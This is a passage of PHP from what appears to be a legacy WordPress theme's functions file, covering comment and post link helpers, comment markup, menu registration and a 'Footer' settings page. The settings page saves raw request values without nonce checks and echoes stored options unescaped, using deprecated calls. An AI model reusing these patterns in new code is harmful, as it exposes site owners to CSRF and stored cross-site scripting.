	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
